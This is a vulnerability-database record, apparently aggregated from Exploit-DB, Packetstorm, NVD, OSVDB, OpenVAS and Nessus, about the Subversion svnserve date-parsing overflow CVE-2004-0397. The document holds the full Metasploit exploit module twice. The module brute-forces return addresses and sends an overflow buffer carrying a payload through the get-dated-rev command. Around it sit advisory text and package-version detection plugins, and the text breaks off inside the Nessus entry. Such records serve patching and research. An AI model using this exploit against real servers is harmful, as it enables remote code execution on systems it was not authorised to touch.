ID EDB-ID:16284 Type exploitdb Reporter metasploit Modified 2010-08-07T00:00:00
Description
Subversion Date Svnserve. CVE-2004-0397. Dos exploit for unix platform
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/http/client'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Brute
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Subversion Date Svnserve',
'Description' => %q{
This is an exploit for the Subversion date parsing overflow. This
exploit is for the svnserve daemon (svn:// protocol) and will not work
for Subversion over webdav (http[s]://). This exploit should never
crash the daemon, and should be safe to do multi-hits.
**WARNING** This exploit seems to (not very often, I've only seen
it during testing) corrupt the subversion database, so be careful!
},
'Author' => 'spoonm',
'Version' => '$Revision: 9971 $',
'References' =>
[
['CVE', '2004-0397'],
['OSVDB', '6301'],
['BID', '10386'],
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
['MIL', '68'],
],
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
'MinNops' => 16,
},
'SaveRegisters' => [ 'esp' ],
'Arch' => 'x86',
'Platform' => [ 'linux', 'bsd' ],
'Targets' =>
[
[
'Linux Bruteforce',
{
'Platform' => 'linux',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffe13 },
'Stop' => { 'Ret' => 0xbfff0000 },
'Step' => 0
}
},
],
[
'FreeBSD Bruteforce',
{
'Platform' => 'bsd',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfbffe13 },
'Stop' => { 'Ret' => 0xbfbf0000 },
'Step' => 0
}
},
],
],
'DisclosureDate' => 'May 19 2004'))
register_options(
[
Opt::RPORT(3690),
OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
], self.class)
register_advanced_options(
[
# 62 on spoonm's, 88 on HD's
OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
], self.class)
end
def check
end
def brute_exploit(addresses)
connect
print_status("Trying #{"%.8x" % addresses['Ret']}...")
buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded
[
"( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
"( ANONYMOUS ( 0; ) )",
"( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
].each_with_index { |buf, index|
trash = sock.get_once
print_line("Received: #{trash}") if debugging?
if (sock.put(buf) || 0) == 0 and index < 3
print_error("Error transmitting buffer.")
raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
end
if index == 3 and trash.length > 0
print_error("Received data when we shouldn't have")
raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
end
}
handler
disconnect
end
def lengther(buf)
"#{buf.length}:" + buf
end
end
{"id": "EDB-ID:16284", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Subversion Date Svnserve", "description": "Subversion Date Svnserve. CVE-2004-0397. Dos exploit for unix platform", "published": "2010-08-07T00:00:00", "modified": "2010-08-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16284/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2004-0397"], "lastseen": "2016-02-01T23:30:03", "viewCount": 5, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-01T23:30:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0397"]}, {"type": "gentoo", "idList": ["GLSA-200405-14"]}, {"type": "openvas", "idList": ["OPENVAS:52460", "OPENVAS:54574"]}, {"type": "canvas", "idList": ["SVNDATE"]}, {"type": "nessus", "idList": ["FEDORA_2004-128.NASL", "FREEBSD_PKG_5D36EF32A9CF11D89C6D0020ED76EF5A.NASL", "SUBVERSION_1_0_4.NASL", "GENTOO_GLSA-200405-14.NASL", "FEDORA_2004-127.NASL", "FREEBSD_SUBVERSION_102_1.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:6301"]}, {"type": "freebsd", "idList": ["5D36EF32-A9CF-11D8-9C6D-0020ED76EF5A"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/SVN/SVNSERVE_DATE"]}, {"type": "exploitdb", "idList": ["EDB-ID:9935", "EDB-ID:304"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82288"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6239"]}, {"type": "suse", "idList": ["SUSE-SA:2004:013"]}], "modified": "2016-02-01T23:30:03", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/16284/", "sourceData": "##\r\n# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/http/client'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Brute\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Subversion Date Svnserve',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is an exploit for the Subversion date parsing overflow. This\r\n\t\t\t\texploit is for the svnserve daemon (svn:// protocol) and will not work\r\n\t\t\t\tfor Subversion over webdav (http[s]://). This exploit should never\r\n\t\t\t\tcrash the daemon, and should be safe to do multi-hits.\r\n\r\n\t\t\t\t**WARNING** This exploit seems to (not very often, I've only seen\r\n\t\t\t\tit during testing) corrupt the subversion database, so be careful!\r\n\t\t\t},\r\n\t\t\t'Author' => 'spoonm',\r\n\t\t\t'Version' => '$Revision: 9971 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2004-0397'],\r\n\t\t\t\t\t['OSVDB', '6301'],\r\n\t\t\t\t\t['BID',\t'10386'],\r\n\t\t\t\t\t['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],\r\n\t\t\t\t\t['MIL', '68'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\r\n\t\t\t\t\t'MinNops' => 16,\r\n\t\t\t\t},\r\n\t\t\t'SaveRegisters' => [ 'esp' ],\r\n\t\t\t'Arch' => 'x86',\r\n\t\t\t'Platform' => [ 'linux', 'bsd' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Linux Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbffffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'FreeBSD Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'bsd',\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbfbffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfbf0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 19 2004'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3690),\r\n\t\t\t\tOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\r\n\t\t\t], self.class)\r\n\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\t# 62 on spoonm's, 88 on HD's\r\n\t\t\t\tOptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\r\n\t\t\t\tOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\tend\r\n\r\n\tdef brute_exploit(addresses)\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\r\n\r\n\t\tbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\r\n\r\n\t\t[\r\n\t\t\t\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\r\n\t\t\t\"( ANONYMOUS ( 0; ) )\",\r\n\t\t\t\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\r\n\t\t].each_with_index { |buf, index|\r\n\t\t\ttrash = sock.get_once\r\n\r\n\t\t\tprint_line(\"Received: #{trash}\") if debugging?\r\n\r\n\t\t\tif (sock.put(buf) || 0) == 0 and index < 3\r\n\t\t\t\tprint_error(\"Error transmitting buffer.\")\r\n\t\t\t\traise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\r\n\t\t\tif index == 3 and trash.length > 0\r\n\t\t\t\tprint_error(\"Received data when we shouldn't have\")\r\n\t\t\t\traise ExploitError, \"Received data when it wasn't expected\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef lengther(buf)\r\n\t\t\"#{buf.length}:\" + buf\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["6301"]}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Stack-based buffer overflow during the apr_time_t data conversion in Subversion 1.0.2 and earlier allows remote attackers to execute arbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev svn-protocol command.", "edition": 3, "cvss3": {}, "published": "2004-07-07T04:00:00", "title": "CVE-2004-0397", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0397"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/a:subversion:subversion:1.0", "cpe:/a:subversion:subversion:1.0.2", "cpe:/a:subversion:subversion:1.0.1"], "id": "CVE-2004-0397", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0397", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:subversion:subversion:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:subversion:subversion:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:subversion:subversion:1.0.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:13:57", "description": "", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "Subversion Date Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2009-10-28T00:00:00", "id": "PACKETSTORM:82288", "href": "https://packetstormsecurity.com/files/82288/Subversion-Date-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/http' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Brute \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Subversion Date Svnserve', \n'Description' => %q{ \nThis is an exploit for the Subversion date parsing overflow. This \nexploit is for the svnserve daemon (svn:// protocol) and will not work \nfor Subversion over webdav (http[s]://). This exploit should never \ncrash the daemon, and should be safe to do multi-hits. \n \n**WARNING** This exploit seems to (not very often, I've only seen \nit during testing) corrupt the subversion database, so be careful! \n}, \n'Author' => 'spoonm', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2004-0397'], \n['OSVDB', '6301'], \n['BID', '10386'], \n['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'], \n['MIL', '68'], \n], \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\", \n'MinNops' => 16, \n}, \n'SaveRegisters' => [ 'esp' ], \n'Arch' => 'x86', \n'Platform' => [ 'linux', 'bsd' ], \n'Targets' => \n[ \n[ \n'Linux Bruteforce', \n{ \n'Platform' => 'linux', \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xbffffe13 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 0 \n} \n}, \n], \n[ \n'FreeBSD Bruteforce', \n{ \n'Platform' => 'bsd', \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xbfbffe13 }, \n'Stop' => { 'Ret' => 0xbfbf0000 }, \n'Step' => 0 \n} \n}, \n], \n \n], \n'DisclosureDate' => 'May 19 2004')) \n \nregister_options( \n[ \nOpt::RPORT(3690), \nOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ]) \n], self.class) \n \nregister_advanced_options( \n[ \n# 62 on spoonm's, 88 on HD's \nOptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]), \nOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ]) \n], self.class) \nend \n \ndef check \nend \n \ndef brute_exploit(addresses) \nconnect \n \nprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\") \n \nbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded \n \n[ \n\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \", \n\"( ANONYMOUS ( 0; ) )\", \n\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \" \n].each_with_index { |buf, index| \ntrash = sock.get_once \n \nprint_line(\"Received: #{trash}\") if debugging? \n \nif (sock.put(buf) || 0) == 0 and index < 3 \nprint_error(\"Error transmitting buffer.\") \nraise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors'] \nend \n \nif index == 3 and trash.length > 0 \nprint_error(\"Received data when we shouldn't have\") \nraise ExploitError, \"Received data when it wasn't expected\" if !datastore['IgnoreErrors'] \nend \n} \n \nhandler \ndisconnect \nend \n \ndef lengther(buf) \n\"#{buf.length}:\" + buf \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82288/svnserve_date.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "cvelist": ["CVE-2004-0397"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Subversion. The Subversion fails to check the boundary when calling sscanf() to decode old-styled date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Subversion. The Subversion fails to check the boundary when calling sscanf() to decode old-styled date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.\n## References:\nVendor URL: http://subversion.tigris.org/\n[Vendor Specific Advisory URL](http://subversion.tigris.org/svn-sscanf-advisory.txt)\n[Secunia Advisory ID:11642](https://secuniaresearch.flexerasoftware.com/advisories/11642/)\n[Secunia Advisory ID:11675](https://secuniaresearch.flexerasoftware.com/advisories/11675/)\n[Secunia Advisory ID:11659](https://secuniaresearch.flexerasoftware.com/advisories/11659/)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200405-14.xml\n[Nessus Plugin ID:13703](https://vulners.com/search?query=pluginID:13703)\n[Nessus Plugin ID:13702](https://vulners.com/search?query=pluginID:13702)\n[Nessus Plugin ID:12618](https://vulners.com/search?query=pluginID:12618)\nGeneric Informational URL: http://security.e-matters.de/advisories/082004.html\n[CVE-2004-0397](https://vulners.com/cve/CVE-2004-0397)\n", "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6301", "id": "OSVDB:6301", "type": "osvdb", "title": "Subversion (SVN) apr_time_t data Conversion Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200405-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54574", "href": "http://plugins.openvas.org/nasl.php?oid=54574", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200405-14 (subversion)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"There is a vulnerability in the Subversion date parsing code which may lead\nto denial of service attacks, or execution of arbitrary code. Both the\nclient and server are vulnerable.\";\ntag_solution = \"All Subversion users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=dev-util/subversion-1.0.3'\n # emerge '>=dev-util/subversion-1.0.3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200405-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=51462\nhttp://subversion.tigris.org/servlets/ReadMsg?list=announce&msgNo=125\nhttp://security.e-matters.de/advisories/082004.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200405-14.\";\n\n \n\nif(description)\n{\n script_id(54574);\n script_cve_id(\"CVE-2004-0397\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200405-14 (subversion)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/subversion\", unaffected: make_list(\"ge 1.0.3\"), vulnerable: make_list(\"le 1.0.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-30T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52460", "href": "http://plugins.openvas.org/nasl.php?oid=52460", "type": "openvas", "title": "FreeBSD Ports: subversion", "sourceData": "#\n#VID 5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: subversion\n\nCVE-2004-0397\nStack-based buffer overflow during the apr_time_t data conversion in\nSubversion 1.0.2 and earlier allows remote attackers to execute\narbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev\nsvn-protocol command.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.e-matters.de/advisories/082004.html\nhttp://www.vuxml.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52460);\n script_version(\"$Revision: 4188 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-30 07:56:47 +0200 (Fri, 30 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(10386);\n script_cve_id(\"CVE-2004-0397\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: subversion\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"subversion\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.2_1\")<0) {\n txt += 'Package subversion version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:25:37", "description": "The following package needs to be updated: subversion", "edition": 1, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : subversion date parsing vulnerability (187)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2011-10-03T00:00:00", "id": "FREEBSD_SUBVERSION_102_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12618", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_5d36ef32a9cf11d89c6d0020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12618);\n script_version(\"$Revision: 1.11 $\");\n script_cve_id(\"CVE-2004-0397\");\n\n script_name(english:\"FreeBSD : subversion date parsing vulnerability (187)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: subversion');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://secunia.com/advisories/30994\nhttp://secunia.com/advisories/9096\nhttp://security.e-matters.de/advisories/082004.html\nhttp://www.freedesktop.org/wiki/Software/dbus\nhttp://www.frsirt.com/english/advisories/2006/0554\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-60.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-61.html\nhttp://www.securiteam.com/unixfocus/5CP0N0UAAA.html\nhttp://www.ssh.com/company/newsroom/article/715/\nhttp://x82.inetcop.org/h0me/adv1sor1es/INCSA.2003-0x82-018-GNATS-bt.txt');\nscript_set_attribute(attribute:'see_also', value: 